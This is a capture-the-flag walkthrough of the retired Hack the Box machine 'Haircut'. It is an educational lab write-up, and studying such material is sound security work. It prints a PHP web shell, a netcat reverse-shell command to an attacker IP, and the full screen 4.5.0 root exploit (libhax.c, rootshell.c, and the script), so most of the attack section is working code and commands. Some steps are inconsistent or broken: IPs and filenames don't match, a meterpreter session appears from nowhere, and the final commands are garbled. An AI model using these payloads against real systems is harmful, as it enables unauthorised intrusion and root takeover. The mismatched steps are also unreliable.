Hello friends!! Today we are going to solve another CTF challenge “Haircut” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of WAPT. Let start and learn how to analyse any vulnerability in a network then exploit it for retrieving desired information.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Haircut is 10.10.10.24 so let’s initiate with nmap port enumeration.
1
|
nmap –A 10.10.10. 24
|
From given below image, you can observe we found port 22 and 80 are open in victim’s network.
Knowing port 80 is open to victim’s network we preferred to explore his IP in a browser and the following image as shown below.
Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on http://10.10.10.24 for PHP file extension.
As a result, it found uploads directory with 403 response and an exposed.php file with 200 ok response.
When we explored http://10.10.10.24/exposed.php we found a search page for finding the location of any hairdresser’s.
- Visit http://10.10.10.24/exposed.php
- You will find it executes a curl script behind.
- There’s folder called /uploads available. Let’s upload our paylaod here.
- Without wasting time I used my PHP backdoor puck.php
GIF8 <?php echo system($_REQUEST['puck']); ?>
http://10.10.14.28/puck.php -o uploads/puck.php
- Execute the payload by visiting
http://10.10.15.16/uploads/payload.php
Now we need to transfer our backdoor file to target system therefore first we need to run python server on port 80 using the following command.
python -m SimpleHTTPServer 80
As puck.php file is successfully transferred into target’s system but we need to execute that file for getting reverse connection, therefore, I simply run following the path in a web browser.
http://10.10.10.24/uploads/puck.php?puck=nc -e /bin/sh 10.10.14.28 9876
After executing uploaded backdoor file come back to the netcat listener
D:\>nc -lvp 9876 listening on [any] 9876 ... 10.10.10.24: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.28] from (UNKNOWN) [10.10.10.24] 46564: NO_DATA ls bounce.jpg puck.php python3 -c 'import pty;pty.spawn("/bin/bash")'
Now let’s finished the task by grabbing user.txt and root.txt file. First I move into home directory and check available files and directories inside it.
1
2
|
cd home
ls
|
here I got a directory maria and after exploring it we found so many files and directory, at last I fetch user.txt file from inside /maria/Desktop/ and use cat command for reading.
1
|
cat user.txt
|
our 1st challenges finished successfully now move for 2ndchallenge.
Then using the following command we got all files and directories having root permission.
1
|
find / –perm –4000 –user root –exec ls –ld {} \; 2>/dev/null
|
Here I notice /usr/bin/screen-4.5.0 now let’s check its exploit if available.
In a new terminal, we look for any exploit present in exploitdb for screen 4.5.0 with help of searchsploit.
1
|
searchsploit screen 4.5.0
|
From given below image you can observe the highlighted exploit 41154.sh which is a shell script for local privilege escalation.
When I didn’t find any appropriate method to execute this shell script for post exploitation then I go with manual compilation and review its code using cat command.
1
|
cat /usr/share/exploitdb/exploits/linux/local/41154.sh
|
If you will notice following code then you will observe this script is written in C language and we have divided it into three part for manual compilation.
- Copy Yellow highlighted the code and past it in a text document and save it as libhax.c
- Copy Orange highlighted the code and past it in a text document and save it as rootshell.c
At last copy remaining code and past it in a text document and save it as 41154.sh
From given below image you can see I have pasted above copied inside rootshell.c
#include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); }
From given below image you can see I have pasted above copied inside libhax.c
#include <stdio.h> #include <sys/types.h> #include <unistd.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); }
From given below image you can see I have paste above remaining copied inside 41154.sh and save all three text document on the desktop in a new folder shell.
#!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell
Let’s compile our C program file manually in our local system using gcc as given below.
1
|
gcc –fPIC –shared –ldl –o libhax.so libhax.c
|
Similarly compile rootshell.c file through the following command.
1
|
gcc –o rootshell rootshell.c
|
From given below image you can see all files we have stored in our folder shell, now let’s upload them into target’s system through our previous meterpreter session.
Since we /tmp has read and write permission, therefore, we are uploading all files in /tmp directory by executing following command.
1
2
|
cd /tmp
upload /root/Desktop/shell .
|
Again for spawning proper tty shell of target’s system, we need to import python file, therefore, I run following command inside meterpreter shell
1
|
python –c ‘import pty;pty.spawn(“/bin/bash”)’
|
Open 41154.sh file as it contains a command for getting root privilege as shown below.
1
|
cat 41154.sh
|
Execute following command and get the root.
1
2
3
4
|
cd /etc
unmask 000
–D –m –L ld.so.preload echo –ne “\x0a/tmp/libhax.so”
cd root
|
Here I got root.txt file now using cat command let open this file and finished our 2nd challenge.
$ /tmp/rootshell /tmp/rootshell # id id uid=0(root) gid=0(root) groups=0(root),33(www-data) # cd /root cd /root # ls ls root.txt # cat root.txt cat root.txt 4c---------51 #
Wonderful!! We had completed the task and hacked this box.
Author: AArti Singh